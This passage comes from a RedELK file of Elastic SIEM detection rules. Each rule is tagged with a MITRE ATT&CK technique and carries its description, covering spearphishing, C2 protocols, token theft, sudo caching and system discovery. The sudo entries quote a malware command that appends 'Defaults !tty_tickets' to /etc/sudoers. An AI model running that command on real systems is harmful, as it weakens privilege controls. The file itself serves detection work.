itself, to avoid defenses that may inspect email attachments.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1192","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1192] Spearphishing Link","query":"threat.technique.id: T1192","references":["https://attack.mitre.org/techniques/T1192","https://attack.mitre.org/techniques/T1566/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1192","name":"Spearphishing Link","id":"T1192"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may send spearphishing messages via third-party services in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1194","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1194] Spearphishing via Service","query":"threat.technique.id: T1194","references":["https://attack.mitre.org/techniques/T1194","https://attack.mitre.org/techniques/T1566/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1194","name":"Spearphishing via Service","id":"T1194"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1071","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1071] Standard Application Layer Protocol","query":"threat.technique.id: T1071","references":["https://attack.mitre.org/techniques/T1071"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1071","name":"Standard Application Layer Protocol","id":"T1071"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[1] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; [2] however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1095","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1095] Standard Non-Application Layer Protocol","query":"threat.technique.id: T1095","references":["https://attack.mitre.org/techniques/T1095"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1095","name":"Standard Non-Application Layer Protocol","id":"T1095"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1032","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1032] Standard Cryptographic Protocol","query":"threat.technique.id: T1032","references":["https://attack.mitre.org/techniques/T1032","https://attack.mitre.org/techniques/T1573"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1032","name":"Standard Cryptographic Protocol","id":"T1032"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).[1] OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.[2][3] An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.\nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.[4] Then, they can send a link through Spearphishing Link to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.[5]\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.[6][7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1528","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1528] Steal Application Access Token","query":"threat.technique.id: T1528","references":["https://attack.mitre.org/techniques/T1528"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1528","name":"Steal Application Access Token","id":"T1528"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. [1]\nThis is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism [2]. Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1165","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1165] Startup Items","query":"threat.technique.id: T1165","references":["https://attack.mitre.org/techniques/T1165","https://attack.mitre.org/techniques/T1037/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1165","name":"Startup Items","id":"T1165"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1165","name":"Startup Items","id":"T1165"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.[1]\nThere are several examples of malware targeting cookies from web browsers on the local system.[2][3] There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.[4][5]\nAfter an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1539","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1539] Steal Web Session Cookie","query":"threat.technique.id: T1539","references":["https://attack.mitre.org/techniques/T1539"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1539","name":"Steal Web Session Cookie","id":"T1539"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.[1][2] By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1492","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1492] Stored Data Manipulation","query":"threat.technique.id: T1492","references":["https://attack.mitre.org/techniques/T1492","https://attack.mitre.org/techniques/T1565/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1492","name":"Stored Data Manipulation","id":"T1492"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"[1] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL [2]. Elevated privileges are required to edit this file though.\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers [3]. In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1169","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1169] Sudo","query":"threat.technique.id: T1169","references":["https://attack.mitre.org/techniques/T1169","https://attack.mitre.org/techniques/T1548/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1169","name":"Sudo","id":"T1169"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"[1] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL [2]. Elevated privileges are required to edit this file though.\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers [3]. In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1206","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1206] Sudo Caching","query":"threat.technique.id: T1206","references":["https://attack.mitre.org/techniques/T1206","https://attack.mitre.org/techniques/T1548/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1206","name":"Sudo Caching","id":"T1206"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\nSupply chain compromise can take place at any stage of the supply chain including:\nManipulation of development tools\nManipulation of a development environment\nManipulation of source code repositories (public or private)\nManipulation of source code in open-source dependencies\nManipulation of software update/distribution mechanisms\nCompromised/infected system images (multiple cases of removable media infected at the factory) [1] [2]\nReplacement of legitimate software with modified versions\nSales of modified/counterfeit products to legitimate distributors\nShipment interdiction\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. [3] [4] [5] Targeting may be specific to a desired victim set [6] or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. [3] [5] Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1195","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1195] Supply Chain Compromise","query":"threat.technique.id: T1195","references":["https://attack.mitre.org/techniques/T1195"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1195","name":"Supply Chain Compromise","id":"T1195"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nTools such as Systeminfo can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.[1][2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1082","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1082] System Information Discovery","query":"threat.technique.id: T1082","references":["https://attack.mitre.org/techniques/T1082"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1082","name":"System Information Discovery","id":"T1082"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [1] [2] [3]\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1019","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1019] System Firmware","query":"threat.technique.id: T1019","references":["https://attack.mitre.org/techniques/T1019","https://attack.mitre.org/techniques/T1542/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1019","name":"System Firmware","id":"T1019"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.\nAdversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1016","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1016] System Network Configuration Discovery","query":"threat.technique.id: T1016","references":["https://attack.mitre.org/techniques/T1016"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1016","name":"System Network Configuration Discovery","id":"T1016"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.[1][2][3]\nUtilities and commands that acquire this information include netstat, \"net use,\" and \"net session\" with Net. In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1049","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1049] System Network Connections Discovery","query":"threat.technique.id: T1049","references":["https://attack.mitre.org/techniques/T1049"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1049","name":"System Network Connections Discovery","id":"T1049"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1033","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1033] System Owner/User Discovery","query":"threat.technique.id: T1033","references":["https://attack.mitre.org/techniques/T1033"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1033","name":"System Owner/User Discovery","id":"T1033"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using Tasklist, and \"net start\" using Net, but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1007","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1007] System Service Discovery","query":"threat.technique.id: T1007","references":["https://attack.mitre.org/techniques/T1007"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1007","name":"System Service Discovery","id":"T1007"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.[1] Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as Disk Structure Wipe or Inhibit System Recovery, to hasten the intended effects on system availability.[2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1529","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1529] System Shutdown/Reboot","query":"threat.technique.id: T1529","references":["https://attack.mitre.org/techniques/T1529"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1529","name":"System Shutdown/Reboot","id":"T1529"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. [1] [2]\nSystem time information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. [2] The information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job [3], or to discover locality information based on time zone to assist in victim targeting.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1124","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1124] System Time Discovery","query":"threat.technique.id: T1124","references":["https://attack.mitre.org/techniques/T1124"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1124","name":"System Time Discovery","id":"T1124"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.[1][2] Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\nSystemd utilizes configuration files known as service units to control how services boot and under 